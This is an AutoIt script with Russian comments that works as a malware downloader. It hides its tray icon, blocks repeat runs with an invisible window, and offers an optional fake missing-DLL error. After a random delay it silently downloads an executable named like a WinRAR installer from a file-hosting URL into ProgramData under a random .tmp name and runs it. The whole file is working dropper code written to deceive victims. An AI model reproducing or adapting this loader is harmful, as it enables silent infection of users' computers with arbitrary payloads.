#NoTrayIcon

$file = "http://disk.karelia.pro/04jfweU/wrar550ru.exe" ; здесь - прямая ссылка на наш файл




if WinExists("l21i4h12l4h1vk4v124hv1k24h") Then
	Exit
EndIf
GUICreate("l21i4h12l4h1vk4v124hv1k24h")					; // Защита от повторного запуска. Создаёт невидимое окно при запуске программы, далее ставим условие - если такое окно найдено - очередной запуск софта не возможен.

;MsgBox(16,"Error","msvcp140.dll was not found") ; // фейк ошибка, на данный момент она закомментирована, если нужна - удаляем ; перед строкой.


Sleep(Random(1000,80000))        ; // Рандомная задержка перед запуском, от 10 до 80 секунд

InetGet($file,"C:\ProgramData\v124b4y12vb8294i142.tmp")
Sleep(5000)													; скачиваем наш файл в программ дату, под именем v124b4y12vb8294i142.tmp , и засыпаем на 5 секунд
Run("C:\ProgramData\v124b4y12vb8294i142.tmp")